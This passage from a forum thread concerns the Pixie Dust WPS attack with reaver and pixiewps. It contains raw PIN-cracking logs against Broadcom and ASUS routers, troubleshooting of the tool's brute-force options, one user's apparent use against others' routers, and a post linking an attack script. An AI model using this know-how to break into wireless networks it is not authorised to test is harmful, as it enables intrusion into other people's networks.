    [P] WPS Manufacturer: Broadcom
    [P] WPS Model Name: Broadcom
    [P] WPS Model Number: 123456
    [P] Access Point Serial Number: 1234
    [+] Received M1 message
    [P] R-Nonce: b0:e6:b2:95:77:cf:66:23:a3:89:be:19:c0:fb:4e:78
    [P] PKR: d5:c1:6b:bf:ff:50:8e:67:99:8c:d0:70:1f:7f:1f:60:12 :0b:a8:e3:84:a6:6d:1b:30:1a:81:94:e2:4d:3b:17:bc:d 3:db:64:7b:70:a7:1d:4b:05:2b:1e:39:03:92:79:63:a7: 56:0e:36:7d:af:89:27:7b:95:93:61:8f:e1:a5:b3:db:d1 :a8:6c:fa:05:1a:27:e6:20:18:1c:ed:ca:32:e3:4c:8e:6 1:fd:a2:31:18:6c:80:c8:ad:48:a2:d6:c7:30:6d:24:a1: 35:c1:7b:17:9c:72:e6:f9:67:d7:0b:0e:f6:19:24:58:67 :06:db:a0:23:a5:3e:f2:e8:de:e9:c4:d1:02:68:f9:76:f 6:83:c6:3d:d1:de:7b:fe:46:6b:aa:ca:e9:53:a9:d5:ca: 91:52:a7:08:ed:b1:92:4e:b3:b8:50:3c:32:fd:81:7f:bb :ca:b2:bf:8a:c7:ef:d8:3c:6d:0a:1d:9b:fa:a1:41:38:6 3:f7:a9:9a:4f:47:38:37:de
    [P] AuthKey: 53:60:51:4a:9f:af:ad:6b:10:5f:2a:fc:85:d4:f3:38:fc :88:2e:dc:52:f8:f4:5a:de:ee:90:e3:5d:3f:a9:96
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    real 0m13.437s
    user 0m0.260s
    sys 0m0.052s
    With the asus n56u

    [+] Associated with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [P] E-Nonce: 0f:c9:4f:ac:5d:27:4c:06:13:74:6f:05:fc:ec:bb:19
    [P] PKE: ca:dc:10:7d:43:a3:ce:9a:9d:7f:0a:45:0f:bf:10:15:30 :6b:83:09:f2:d4:69:37:0a:eb:97:c7:27:56:63:70:a0:6 4:49:11:09:f0:39:3e:af:e9:e3:74:d2:2e:76:2b:52:b4: f6:87:a8:da:26:2c:dc:1a:d9:25:29:03:51:4e:3a:99:49 :32:14:62:8e:73:35:31:4c:21:fa:e7:a7:84:de:98:95:f 1:dc:f7:23:ff:25:d6:b7:fb:c8:0d:52:67:5f:11:96:bf: a3:d4:08:b3:99:7e:51:37:1a:46:4b:a6:6d:88:e1:56:c4 :a5:84:61:1a:a0:e4:f8:db:5c:ab:78:a9:0c:0c:d1:2c:8 e:67:0e:5f:37:ce:07:00:50:6d:6b:d9:e1:df:4c:6b:e2: 3c:f9:f5:85:84:67:54:56:79:61:84:d7:a0:b9:2c:14:02 :33:54:24:68:21:f5:e0:22:6c:00:b4:b3:5d:58:9e:49:9 2:85:06:cf:10:16:c3:3c:e8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: WPS Router
    [P] WPS Model Number: RT-N56U
    [P] Access Point Serial Number: 00000000
    [+] Received M1 message
    [P] R-Nonce: dd:00:db:6e:84:39:cd:26:d1:7c:bb:42:fa:f6:6b:cf
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 6a:1e:35:9e:61:a6:13:8b:f9:b5:d1:33:b8:fa:07:e7:10 :80:20:76:9b:1e:d2:15:9e:8e:46:35:d1:65:2b:a8
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Should it be sending M3 msg?
    Last edited by undersc0re; 2015-05-07 at 16:55.

  43. #93
    apparently you are too far from the router to communicate properly with him

    Try to get closer to the router.

  44. #94
    Quote Originally Posted by t6_x View Post
    apparently you are too far from the router to communicate properly with him

    Try to get closer to the router.
    The broadcom was in the basement and the asus on the same table as my computer, but I will continue to test and keep trying! Only time I had a response any better was getting the pins for a -W against my friends dlink router and trying them and then it only failed in the end as it was unable to retrieve the passphrase. I will trouble shoot some more, I am sure it is something simple I am overlooking. Thanks for your input though. Is it ok to ask these questions here or should I be in an irc channel or different forum area?

  45. #95
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by undersc0re View Post
    The broadcom was in the basement and the asus on the same table as my computer, but I will continue to test and keep trying! Only time I had a response any better was getting the pins for a -W against my friends dlink router and trying them and then it only failed in the end as it was unable to retrieve the passphrase. I will trouble shoot some more, I am sure it is something simple I am overlooking. Thanks for your input though. Is it ok to ask these questions here or should I be in an irc channel or different forum area?
    It would be preferred to put it on the reaver thread
    Last edited by soxrok2212; 2015-05-10 at 11:55.

  46. #96
    Join Date
    2015-Apr
    Posts
    9
    Thanks For your Pixiewps 1.1 ..Now TD5130 V 1 works and V 2 it works But V 3 not works And thomson routeur

  47. #97
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by iliass View Post
    Thanks For your Pixiewps 1.1 ..Now TD5130 V 1 works and V 2 it works But V 3 not works And thomson routeur
    Dude we're not here to hack all your neighbors wireless, it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.

  48. #98
    about -f , --force option ...
    I tried to find my pin with -f option , But it was not find.. Realtek Chipset ..
    İt seacrhed PRNG between 2015 and 1971 years....

    I wanna ask..

    Maybe Prng is set between 2015 and 2038 years..?? Becasuse PRNG , time seed finish at 01.01.2038..

    Or large time 1901 ?

    is it possible ?

    Other question ..

    İf I set my sytem time 1901 ... İs it runnig 1971 ? or error?

  49. #99
    Quote Originally Posted by soxrok2212 View Post
    Dude we're not here to hack all your neighbors wireless, it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.
    experience is something you don't get until just after you need it.

  50. #100
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams have released their lab version of Pixie Dust Data Sequence Analyzer PDDSA-06.sh for general use. This script requires the installation of pixiedust1.1 by wiire and has been updated to allow for the more advanced features of version 1.1 such as brute forcing the WPS Pin

    PDDSA-06.sh supports the latest modded reaver program from t6_x and datahead and soxrok2212 as of 11 May 15

    You can download at:

    http://www.datafilehost.com/d/a30c5b3d

    or the attachment below at the link below.


    http://forum.aircrack-ng.org/index.p...ic=868.msg2904


    Older versions of the modded reaver program are not supported

    MTeams
    Last edited by mmusket33; 2015-05-11 at 12:10.

Similar Threads

  1. Data gathering for pixiewps (pixie dust attack)
    By wiire in forum Project Archive
    Replies: 16
    Last Post: 2018-07-24, 01:42
  2. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  3. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •